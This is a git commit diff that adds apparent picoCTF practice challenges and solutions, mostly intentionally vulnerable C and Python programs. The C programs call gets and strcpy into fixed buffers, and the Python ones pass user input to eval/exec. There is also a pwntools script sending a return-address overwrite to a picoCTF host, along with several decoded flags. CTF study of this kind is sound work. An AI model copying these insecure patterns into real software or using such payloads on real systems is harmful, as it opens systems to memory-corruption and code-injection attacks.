some more playlist stuff

mochis_tale/binary_exploitation/buffer_overflow_0/flag.txt

@@ -0,0 +1 @@
+flagFLAG

mochis_tale/binary_exploitation/buffer_overflow_0/vuln.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+
+#define FLAGSIZE_MAX 64
+
+char flag[FLAGSIZE_MAX];
+
+void sigsegv_handler(int sig) {
+  printf("%s\n", flag);
+  fflush(stdout);
+  exit(1);
+}
+
+void vuln(char *input){
+  char buf2[16];
+  strcpy(buf2, input);
+}
+
+int main(int argc, char **argv){
+  
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+  
+  fgets(flag,FLAGSIZE_MAX,f);
+  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+
+  printf("Input: ");
+  fflush(stdout);
+  char buf1[100];
+  gets(buf1); 
+  vuln(buf1);
+  printf("The program will exit now\n");
+  return 0;
+}

mochis_tale/binary_exploitation/buffer_overflow_1/sol.py

@@ -0,0 +1,11 @@
+#!/home/maxime/.pyvenv/bin/python3
+from pwn import *
+
+conn = remote("saturn.picoctf.net", 63154)
+
+conn.recvline()
+conn.sendline(b'0'*44 + b'\xf6\x91\x04\x08')
+conn.interactive()
+
+conn.close()
+

mochis_tale/binary_exploitation/buffer_overflow_1/vuln.c

@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+

mochis_tale/binary_exploitation/local_target/local-target.c

@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+
+
+int main(){
+  FILE *fptr;
+  char c;
+
+  char input[16];
+  int num = 64;
+  
+  printf("Enter a string: ");
+  fflush(stdout);
+  gets(input);
+  printf("\n");
+  
+  printf("num is %d\n", num);
+  fflush(stdout);
+  
+  if( num == 65 ){
+    printf("You win!\n");
+    fflush(stdout);
+    // Open file
+    fptr = fopen("flag.txt", "r");
+    if (fptr == NULL)
+    {
+        printf("Cannot open file.\n");
+        fflush(stdout);
+        exit(0);
+    }
+
+    // Read contents from file
+    c = fgetc(fptr);
+    while (c != EOF)
+    {
+        printf ("%c", c);
+        c = fgetc(fptr);
+    }
+    fflush(stdout);
+
+    printf("\n");
+    fflush(stdout);
+    fclose(fptr);
+    exit(0);
+  }
+  
+  printf("Bye!\n");
+  fflush(stdout);
+}

mochis_tale/binary_exploitation/picker_4/picker-IV.c

@@ -0,0 +1,49 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <unistd.h>
+
+
+void print_segf_message(){
+  printf("Segfault triggered! Exiting.\n");
+  sleep(15);
+  exit(SIGSEGV);
+}
+
+int win() {
+  FILE *fptr;
+  char c;
+
+  printf("You won!\n");
+  // Open file
+  fptr = fopen("flag.txt", "r");
+  if (fptr == NULL)
+  {
+      printf("Cannot open file.\n");
+      exit(0);
+  }
+
+  // Read contents from file
+  c = fgetc(fptr);
+  while (c != EOF)
+  {
+      printf ("%c", c);
+      c = fgetc(fptr);
+  }
+
+  printf("\n");
+  fclose(fptr);
+}
+
+int main() {
+  signal(SIGSEGV, print_segf_message);
+  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+  unsigned int val;
+  printf("Enter the address in hex to jump to, excluding '0x': ");
+  scanf("%x", &val);
+  printf("You input 0x%x\n", val);
+
+  void (*foo)(void) = (void (*)())val;
+  foo();
+}

mochis_tale/interlude/picker_2/hex

@@ -0,0 +1 @@
+0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x66 0x31 0x6c 0x37 0x33 0x72 0x35 0x5f 0x66 0x34 0x31 0x6c 0x5f 0x63 0x30 0x64 0x33 0x5f 0x72 0x33 0x66 0x34 0x63 0x37 0x30 0x72 0x5f 0x6d 0x31 0x67 0x68 0x37 0x5f 0x35 0x75 0x63 0x63 0x33 0x33 0x64 0x5f 0x30 0x62 0x35 0x66 0x31 0x31 0x33 0x31 0x7d

mochis_tale/interlude/picker_2/picker-II.py

@@ -0,0 +1,175 @@
+
+import sys
+
+
+
+def getRandomNumber():
+  print(4)  # Chosen by fair die roll.
+            # Guaranteed to be random.
+            # (See XKCD)
+
+def exit():
+  sys.exit(0)
+  
+def esoteric1():
+  esoteric = \
+  '''
+  int query_apm_bios(void)
+{
+	struct biosregs ireg, oreg;
+
+	/* APM BIOS installation check */
+	initregs(&ireg);
+	ireg.ah = 0x53;
+	intcall(0x15, &ireg, &oreg);
+
+	if (oreg.flags & X86_EFLAGS_CF)
+		return -1;		/* No APM BIOS */
+
+	if (oreg.bx != 0x504d)		/* "PM" signature */
+		return -1;
+
+	if (!(oreg.cx & 0x02))		/* 32 bits supported? */
+		return -1;
+
+	/* Disconnect first, just in case */
+	ireg.al = 0x04;
+	intcall(0x15, &ireg, NULL);
+
+	/* 32-bit connect */
+	ireg.al = 0x03;
+	intcall(0x15, &ireg, &oreg);
+
+	boot_params.apm_bios_info.cseg        = oreg.ax;
+	boot_params.apm_bios_info.offset      = oreg.ebx;
+	boot_params.apm_bios_info.cseg_16     = oreg.cx;
+	boot_params.apm_bios_info.dseg        = oreg.dx;
+	boot_params.apm_bios_info.cseg_len    = oreg.si;
+	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
+	boot_params.apm_bios_info.dseg_len    = oreg.di;
+
+	if (oreg.flags & X86_EFLAGS_CF)
+		return -1;
+
+	/* Redo the installation check as the 32-bit connect;
+	   some BIOSes return different flags this way... */
+
+	ireg.al = 0x00;
+	intcall(0x15, &ireg, &oreg);
+
+	if ((oreg.eflags & X86_EFLAGS_CF) || oreg.bx != 0x504d) {
+		/* Failure with 32-bit connect, try to disconnect and ignore */
+		ireg.al = 0x04;
+		intcall(0x15, &ireg, NULL);
+		return -1;
+	}
+
+	boot_params.apm_bios_info.version = oreg.ax;
+	boot_params.apm_bios_info.flags   = oreg.cx;
+	return 0;
+}
+  '''
+  print(esoteric)
+
+
+def win():
+  # This line will not work locally unless you create your own 'flag.txt' in
+  #   the same directory as this script
+  flag = open('flag.txt', 'r').read()
+  #flag = flag[:-1]
+  flag = flag.strip()
+  str_flag = ''
+  for c in flag:
+    str_flag += str(hex(ord(c))) + ' '
+  print(str_flag)
+  
+  
+def esoteric2():
+  esoteric = \
+  '''
+#include "boot.h"
+
+#define MAX_8042_LOOPS	100000
+#define MAX_8042_FF	32
+
+static int empty_8042(void)
+{
+	u8 status;
+	int loops = MAX_8042_LOOPS;
+	int ffs   = MAX_8042_FF;
+
+	while (loops--) {
+		io_delay();
+
+		status = inb(0x64);
+		if (status == 0xff) {
+			/* FF is a plausible, but very unlikely status */
+			if (!--ffs)
+				return -1; /* Assume no KBC present */
+		}
+		if (status & 1) {
+			/* Read and discard input data */
+			io_delay();
+			(void)inb(0x60);
+		} else if (!(status & 2)) {
+			/* Buffers empty, finished! */
+			return 0;
+		}
+	}
+
+	return -1;
+}
+
+/* Returns nonzero if the A20 line is enabled.  The memory address
+   used as a test is the int $0x80 vector, which should be safe. */
+
+#define A20_TEST_ADDR	(4*0x80)
+#define A20_TEST_SHORT  32
+#define A20_TEST_LONG	2097152	/* 2^21 */
+
+static int a20_test(int loops)
+{
+	int ok = 0;
+	int saved, ctr;
+
+	set_fs(0x0000);
+	set_gs(0xffff);
+
+	saved = ctr = rdfs32(A20_TEST_ADDR);
+
+	while (loops--) {
+		wrfs32(++ctr, A20_TEST_ADDR);
+		io_delay();	/* Serialize and make delay constant */
+		ok = rdgs32(A20_TEST_ADDR+0x10) ^ ctr;
+		if (ok)
+			break;
+	}
+
+	wrfs32(saved, A20_TEST_ADDR);
+	return ok;
+}
+
+/* Quick test to see if A20 is already enabled */
+static int a20_test_short(void)
+{
+	return a20_test(A20_TEST_SHORT);
+}
+  '''
+  print(esoteric)
+
+
+def filter(user_input):
+  if 'win' in user_input:
+    return False
+  return True
+
+
+while(True):
+  try:
+    user_input = input('==> ')
+    if( filter(user_input) ):
+      eval(user_input + '()')
+    else:
+      print('Illegal input')
+  except Exception as e:
+    print(e)

mochis_tale/interlude/picker_2/sol.py

@@ -0,0 +1,5 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+with open("hex", 'r') as f:
+    print(''.join(map(lambda a: chr(int(a, 16)), f.readline().strip().split(' '))))
+

mochis_tale/interlude/picker_3/hex

@@ -0,0 +1 @@
+0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x37 0x68 0x31 0x35 0x5f 0x31 0x35 0x5f 0x77 0x68 0x34 0x37 0x5f 0x77 0x33 0x5f 0x67 0x33 0x37 0x5f 0x77 0x31 0x37 0x68 0x5f 0x75 0x35 0x33 0x72 0x35 0x5f 0x31 0x6e 0x5f 0x63 0x68 0x34 0x72 0x67 0x33 0x5f 0x61 0x31 0x38 0x36 0x66 0x39 0x61 0x63 0x7d

mochis_tale/interlude/picker_3/picker-III.py

@@ -0,0 +1,198 @@
+
+import re
+
+
+
+USER_ALIVE = True
+FUNC_TABLE_SIZE = 4
+FUNC_TABLE_ENTRY_SIZE = 32
+CORRUPT_MESSAGE = 'Table corrupted. Try entering \'reset\' to fix it'
+
+func_table = ''
+
+def reset_table():
+  global func_table
+
+  # This table is formatted for easier viewing, but it is really one line
+  func_table = \
+'''\
+print_table                     \
+read_variable                   \
+write_variable                  \
+getRandomNumber                 \
+'''
+
+def check_table():
+  global func_table
+
+  if( len(func_table) != FUNC_TABLE_ENTRY_SIZE * FUNC_TABLE_SIZE):
+    return False
+
+  return True
+
+
+def get_func(n):
+  global func_table
+
+  # Check table for viability
+  if( not check_table() ):
+    print(CORRUPT_MESSAGE)
+    return
+
+  # Get function name from table
+  func_name = ''
+  func_name_offset = n * FUNC_TABLE_ENTRY_SIZE
+  for i in range(func_name_offset, func_name_offset+FUNC_TABLE_ENTRY_SIZE):
+    if( func_table[i] == ' '):
+      func_name = func_table[func_name_offset:i]
+      break
+
+  if( func_name == '' ):
+    func_name = func_table[func_name_offset:func_name_offset+FUNC_TABLE_ENTRY_SIZE]
+  
+  return func_name
+
+
+def print_table():
+  # Check table for viability
+  if( not check_table() ):
+    print(CORRUPT_MESSAGE)
+    return
+
+  for i in range(0, FUNC_TABLE_SIZE):
+    j = i + 1
+    print(str(j)+': ' + get_func(i))
+
+
+def filter_var_name(var_name):
+  r = re.search('^[a-zA-Z_][a-zA-Z_0-9]*$', var_name)
+  if r:
+    return True
+  else:
+    return False
+
+
+def read_variable():
+  var_name = input('Please enter variable name to read: ')
+  if( filter_var_name(var_name) ):
+    eval('print('+var_name+')')
+  else:
+    print('Illegal variable name')
+
+
+def filter_value(value):
+  if ';' in value or '(' in value or ')' in value:
+    return False
+  else:
+    return True
+
+
+def write_variable():
+  var_name = input('Please enter variable name to write: ')
+  if( filter_var_name(var_name) ):
+    value = input('Please enter new value of variable: ')
+    if( filter_value(value) ):
+      exec('global '+var_name+'; '+var_name+' = '+value)
+    else:
+      print('Illegal value')
+  else:
+    print('Illegal variable name')
+
+
+def call_func(n):
+  """
+  Calls the nth function in the function table.
+  Arguments:
+    n: The function to call. The first function is 0.
+  """
+
+  # Check table for viability
+  if( not check_table() ):
+    print(CORRUPT_MESSAGE)
+    return
+
+  # Check n
+  if( n < 0 ):
+    print('n cannot be less than 0. Aborting...')
+    return
+  elif( n >= FUNC_TABLE_SIZE ):
+    print('n cannot be greater than or equal to the function table size of '+FUNC_TABLE_SIZE)
+    return
+
+  # Get function name from table
+  func_name = get_func(n)
+
+  # Run the function
+  eval(func_name+'()')
+
+
+def dummy_func1():
+  print('in dummy_func1')
+
+def dummy_func2():
+  print('in dummy_func2')
+
+def dummy_func3():
+  print('in dummy_func3')
+
+def dummy_func4():
+  print('in dummy_func4')
+
+def getRandomNumber():
+  print(4)  # Chosen by fair die roll.
+            # Guaranteed to be random.
+            # (See XKCD)
+
+def win():
+  # This line will not work locally unless you create your own 'flag.txt' in
+  #   the same directory as this script
+  flag = open('flag.txt', 'r').read()
+  #flag = flag[:-1]
+  flag = flag.strip()
+  str_flag = ''
+  for c in flag:
+    str_flag += str(hex(ord(c))) + ' '
+  print(str_flag)
+
+def help_text():
+  print(
+  '''
+This program fixes vulnerabilities in its predecessor by limiting what
+functions can be called to a table of predefined functions. This still puts
+the user in charge, but prevents them from calling undesirable subroutines.
+
+* Enter 'quit' to quit the program.
+* Enter 'help' for this text.
+* Enter 'reset' to reset the table.
+* Enter '1' to execute the first function in the table.
+* Enter '2' to execute the second function in the table.
+* Enter '3' to execute the third function in the table.
+* Enter '4' to execute the fourth function in the table.
+
+Here's the current table:
+  '''
+  )
+  print_table()
+
+
+
+reset_table()
+
+while(USER_ALIVE):
+  choice = input('==> ')
+  if( choice == 'quit' or choice == 'exit' or choice == 'q' ):
+    USER_ALIVE = False
+  elif( choice == 'help' or choice == '?' ):
+    help_text()
+  elif( choice == 'reset' ):
+    reset_table()
+  elif( choice == '1' ):
+    call_func(0)
+  elif( choice == '2' ):
+    call_func(1)
+  elif( choice == '3' ):
+    call_func(2)
+  elif( choice == '4' ):
+    call_func(3)
+  else:
+    print('Did not understand "'+choice+'" Have you tried "help"?')

mochis_tale/interlude/picker_3/sol.py

@@ -0,0 +1,5 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+with open("hex", 'r') as f:
+    print(''.join(map(lambda a: chr(int(a, 16)), f.readline().strip().split(' '))))
+

mochis_tale/intro_to_assembly/bit_o_asm_1/disassembler-dump0_a.txt

@@ -0,0 +1,8 @@
+<+0>:     endbr64 
+<+4>:     push   rbp
+<+5>:     mov    rbp,rsp
+<+8>:     mov    DWORD PTR [rbp-0x4],edi
+<+11>:    mov    QWORD PTR [rbp-0x10],rsi
+<+15>:    mov    eax,0x30
+<+20>:    pop    rbp
+<+21>:    ret

mochis_tale/intro_to_assembly/bit_o_asm_2/disassembler-dump0_b.txt

@@ -0,0 +1,9 @@
+<+0>:     endbr64 
+<+4>:     push   rbp
+<+5>:     mov    rbp,rsp
+<+8>:     mov    DWORD PTR [rbp-0x14],edi
+<+11>:    mov    QWORD PTR [rbp-0x20],rsi
+<+15>:    mov    DWORD PTR [rbp-0x4],0x9fe1a
+<+22>:    mov    eax,DWORD PTR [rbp-0x4]
+<+25>:    pop    rbp
+<+26>:    ret

mochis_tale/intro_to_assembly/bit_o_asm_3/disassembler-dump0_c.txt

@@ -0,0 +1,14 @@
+<+0>:     endbr64 
+<+4>:     push   rbp
+<+5>:     mov    rbp,rsp
+<+8>:     mov    DWORD PTR [rbp-0x14],edi
+<+11>:    mov    QWORD PTR [rbp-0x20],rsi
+<+15>:    mov    DWORD PTR [rbp-0xc],0x9fe1a
+<+22>:    mov    DWORD PTR [rbp-0x8],0x4
+<+29>:    mov    eax,DWORD PTR [rbp-0xc]
+<+32>:    imul   eax,DWORD PTR [rbp-0x8]
+<+36>:    add    eax,0x1f5
+<+41>:    mov    DWORD PTR [rbp-0x4],eax
+<+44>:    mov    eax,DWORD PTR [rbp-0x4]
+<+47>:    pop    rbp
+<+48>:    ret

mochis_tale/intro_to_assembly/bit_o_asm_4/disassembler-dump0_d.txt

@@ -0,0 +1,14 @@
+<+0>:     endbr64 
+<+4>:     push   rbp
+<+5>:     mov    rbp,rsp
+<+8>:     mov    DWORD PTR [rbp-0x14],edi
+<+11>:    mov    QWORD PTR [rbp-0x20],rsi
+<+15>:    mov    DWORD PTR [rbp-0x4],0x9fe1a
+<+22>:    cmp    DWORD PTR [rbp-0x4],0x2710
+<+29>:    jle    0x55555555514e <main+37>
+<+31>:    sub    DWORD PTR [rbp-0x4],0x65
+<+35>:    jmp    0x555555555152 <main+41>
+<+37>:    add    DWORD PTR [rbp-0x4],0x65
+<+41>:    mov    eax,DWORD PTR [rbp-0x4]
+<+44>:    pop    rbp
+<+45>:    ret

mochis_tale/warmup/ascii_numbers/sol.py

@@ -0,0 +1,8 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+with open("string", 'r') as f:
+    line = f.readline().strip()
+    chars = line.split(' ')
+    chars = map(lambda a: chr(int(a, 16)), chars)
+    print(''.join(chars))
+

mochis_tale/warmup/ascii_numbers/string

@@ -0,0 +1 @@
+0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x34 0x35 0x63 0x31 0x31 0x5f 0x6e 0x30 0x5f 0x71 0x75 0x33 0x35 0x37 0x31 0x30 0x6e 0x35 0x5f 0x31 0x6c 0x6c 0x5f 0x74 0x33 0x31 0x31 0x5f 0x79 0x33 0x5f 0x6e 0x30 0x5f 0x6c 0x31 0x33 0x35 0x5f 0x34 0x34 0x35 0x64 0x34 0x31 0x38 0x30 0x7d

mochis_tale/warmup/obedient_cat/flag

@@ -0,0 +1 @@
+picoCTF{s4n1ty_v3r1f13d_2fd6ed29}

mochis_tale/warmup/picker_1/code

@@ -0,0 +1 @@
+0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x34 0x5f 0x64 0x31 0x34 0x6d 0x30 0x6e 0x64 0x5f 0x31 0x6e 0x5f 0x37 0x68 0x33 0x5f 0x72 0x30 0x75 0x67 0x68 0x5f 0x36 0x65 0x30 0x34 0x34 0x34 0x30 0x64 0x7d

mochis_tale/warmup/picker_1/picker-I.py

@@ -0,0 +1,167 @@
+
+import sys
+
+
+
+def getRandomNumber():
+  print(4)  # Chosen by fair die roll.
+            # Guaranteed to be random.
+            # (See XKCD)
+
+def exit():
+  sys.exit(0)
+  
+def esoteric1():
+  esoteric = \
+  '''
+  int query_apm_bios(void)
+{
+	struct biosregs ireg, oreg;
+
+	/* APM BIOS installation check */
+	initregs(&ireg);
+	ireg.ah = 0x53;
+	intcall(0x15, &ireg, &oreg);
+
+	if (oreg.flags & X86_EFLAGS_CF)
+		return -1;		/* No APM BIOS */
+
+	if (oreg.bx != 0x504d)		/* "PM" signature */
+		return -1;
+
+	if (!(oreg.cx & 0x02))		/* 32 bits supported? */
+		return -1;
+
+	/* Disconnect first, just in case */
+	ireg.al = 0x04;
+	intcall(0x15, &ireg, NULL);
+
+	/* 32-bit connect */
+	ireg.al = 0x03;
+	intcall(0x15, &ireg, &oreg);
+
+	boot_params.apm_bios_info.cseg        = oreg.ax;
+	boot_params.apm_bios_info.offset      = oreg.ebx;
+	boot_params.apm_bios_info.cseg_16     = oreg.cx;
+	boot_params.apm_bios_info.dseg        = oreg.dx;
+	boot_params.apm_bios_info.cseg_len    = oreg.si;
+	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
+	boot_params.apm_bios_info.dseg_len    = oreg.di;
+
+	if (oreg.flags & X86_EFLAGS_CF)
+		return -1;
+
+	/* Redo the installation check as the 32-bit connect;
+	   some BIOSes return different flags this way... */
+
+	ireg.al = 0x00;
+	intcall(0x15, &ireg, &oreg);
+
+	if ((oreg.eflags & X86_EFLAGS_CF) || oreg.bx != 0x504d) {
+		/* Failure with 32-bit connect, try to disconnect and ignore */
+		ireg.al = 0x04;
+		intcall(0x15, &ireg, NULL);
+		return -1;
+	}
+
+	boot_params.apm_bios_info.version = oreg.ax;
+	boot_params.apm_bios_info.flags   = oreg.cx;
+	return 0;
+}
+  '''
+  print(esoteric)
+
+
+def win():
+  # This line will not work locally unless you create your own 'flag.txt' in
+  #   the same directory as this script
+  flag = open('flag.txt', 'r').read()
+  #flag = flag[:-1]
+  flag = flag.strip()
+  str_flag = ''
+  for c in flag:
+    str_flag += str(hex(ord(c))) + ' '
+  print(str_flag)
+  
+  
+def esoteric2():
+  esoteric = \
+  '''
+#include "boot.h"
+
+#define MAX_8042_LOOPS	100000
+#define MAX_8042_FF	32
+
+static int empty_8042(void)
+{
+	u8 status;
+	int loops = MAX_8042_LOOPS;
+	int ffs   = MAX_8042_FF;
+
+	while (loops--) {
+		io_delay();
+
+		status = inb(0x64);
+		if (status == 0xff) {
+			/* FF is a plausible, but very unlikely status */
+			if (!--ffs)
+				return -1; /* Assume no KBC present */
+		}
+		if (status & 1) {
+			/* Read and discard input data */
+			io_delay();
+			(void)inb(0x60);
+		} else if (!(status & 2)) {
+			/* Buffers empty, finished! */
+			return 0;
+		}
+	}
+
+	return -1;
+}
+
+/* Returns nonzero if the A20 line is enabled.  The memory address
+   used as a test is the int $0x80 vector, which should be safe. */
+
+#define A20_TEST_ADDR	(4*0x80)
+#define A20_TEST_SHORT  32
+#define A20_TEST_LONG	2097152	/* 2^21 */
+
+static int a20_test(int loops)
+{
+	int ok = 0;
+	int saved, ctr;
+
+	set_fs(0x0000);
+	set_gs(0xffff);
+
+	saved = ctr = rdfs32(A20_TEST_ADDR);
+
+	while (loops--) {
+		wrfs32(++ctr, A20_TEST_ADDR);
+		io_delay();	/* Serialize and make delay constant */
+		ok = rdgs32(A20_TEST_ADDR+0x10) ^ ctr;
+		if (ok)
+			break;
+	}
+
+	wrfs32(saved, A20_TEST_ADDR);
+	return ok;
+}
+
+/* Quick test to see if A20 is already enabled */
+static int a20_test_short(void)
+{
+	return a20_test(A20_TEST_SHORT);
+}
+  '''
+  print(esoteric)
+
+
+while(True):
+  try:
+    print('Try entering "getRandomNumber" without the double quotes...')
+    user_input = input('==> ')
+    eval(user_input + '()')
+  except Exception as e:
+    print(e)

mochis_tale/warmup/picker_1/sol.py

@@ -0,0 +1,6 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+with open("code", 'r') as f:
+    line = f.readline()
+    print(''.join(map(lambda a: chr(int(a, 16)), line.strip().split(' '))))
+

mochis_tale/warmup/warmed_up/sol.py

@@ -0,0 +1,6 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+s = "0x3D"
+i = int(s, 16)
+print(i)
+